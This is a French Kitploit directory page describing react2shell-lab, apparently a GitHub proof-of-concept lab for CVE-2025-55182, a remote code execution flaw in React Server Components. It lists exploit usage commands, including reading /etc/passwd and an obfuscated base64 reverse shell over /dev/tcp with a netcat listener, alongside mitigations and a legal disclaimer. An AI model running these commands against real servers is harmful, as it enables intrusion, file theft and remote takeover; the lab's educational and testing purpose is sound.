Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react2shell-lab — Laboratoire PoC CVE-2025-55182 React2Shell | Kitploit
Outils/GitHubGitHub/alsaut1/react2shell-lab
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges UtilesLabs et Pratique
GitHub
713il y a 9 moisPas encore vérifié
alsaut1/react2shell-lab

react2shell-lab

Laboratoire PoC CVE-2025-55182 React2Shell

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

React2Shell - Laboratoire CVE-2025-55182

Un laboratoire complet pour démontrer et tester la vulnérabilité critique CVE-2025-55182 dans les composants serveur React.

⚠️ Usage éducatif uniquement

Ce dépôt est destiné à :

  • La recherche et l'éducation en sécurité
  • La compréhension des mécanismes de vulnérabilités
  • Les tests sur vos propres systèmes
  • La préparation aux programmes de chasse aux bogues

N'utilisez pas cela contre des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite. L'accès non autorisé est illégal.

🔴 Détails de la vulnérabilité

  • CVE ID : CVE-2025-55182
  • Score CVSS : 10,0 (Critique)
  • Type : Exécution de code à distance (RCE) sans authentification
  • Composants affectés :
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Cause racine : Désérialisation non sécurisée dans le protocole « Flight » des composants serveur React

⚡ Capacités

✅ Exécuter des commandes arbitraires sans authentification ✅ Lire les fichiers système ✅ Créer et modifier des fichiers ✅ Établir des connexions de shell inversé ✅ Prendre le contrôle complet du serveur

🚀 Démarrage rapide

Télécharger l’outil

1. Installation

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

Le serveur démarrera sur http://localhost:3000

2. Vérifier la vulnérabilité

root@kitploit:~
bash check-cve.sh

3. Exécution des exploits

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Shell inversé

root@kitploit:~
# Terminal 1 - Écouteur
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Structure du projet

root@kitploit:~
├── app/              # Application Next.js vulnérable
├── exploit/          # Preuve de concept fonctionnelle
│   └── rce_final.py  # Script d'exploit principal
├── check-cve.sh      # Vérificateur de vulnérabilité automatisé
├── package.json      # Dépendances vulnérables
└── README.md

🔧 Détails techniques

La vulnérabilité réside dans la logique de désérialisation des payloads des composants serveur React. L'exploit exploite la pollution de prototype pour exécuter du code arbitraire via process.mainModule.require('child_process').execSync().

Flux d'attaque

  1. Créer des données de formulaire multipart malveillantes
  2. Les envoyer à l'application React vulnérable
  3. Exploiter la désérialisation non sécurisée dans le protocole « Flight »
  4. Obtenir une exécution de code à distance sur le serveur

📊 Impact

  • Confidentialité : ÉLEVÉE (lire tout fichier)
  • Intégrité : ÉLEVÉE (modifier/créer des fichiers)
  • Disponibilité : ÉLEVÉE (exécuter des commandes de déni de service)

✅ Mesures d'atténuation

  1. Mettre à jour React vers 19.2.1 ou ultérieur
  2. Mettre à jour Next.js vers 15.0.5+ ou 16.0.7+
  3. Déployer des règles de pare-feu applicatif web (WAF)
  4. Surveiller les journaux du serveur pour détecter les tentatives d'exploitation
  5. Utiliser des mécanismes de protection à l'exécution

📚 Références

  • react2shell.com
  • Détails CVE-2025-55182
  • Avis de sécurité React
  • Calculateur CVSS

⚖️ Avertissement juridique

Ce code est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Les utilisateurs sont responsables de s'assurer qu'ils disposent d'une autorisation appropriée avant de tester un système. L'accès non autorisé à des systèmes informatiques est illégal en vertu de lois telles que le Computer Fraud and Abuse Act (CFAA) et des législations similaires dans d'autres juridictions.

L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.

🎓 Objectifs pédagogiques

Après avoir travaillé avec ce laboratoire, vous comprendrez :

  • Comment fonctionnent les vulnérabilités de désérialisation non sécurisée
  • Les techniques d'attaque par pollution de prototype
  • L'architecture des composants serveur React
  • Les méthodes d'exploitation RCE
  • Les bonnes pratiques de divulgation de vulnérabilités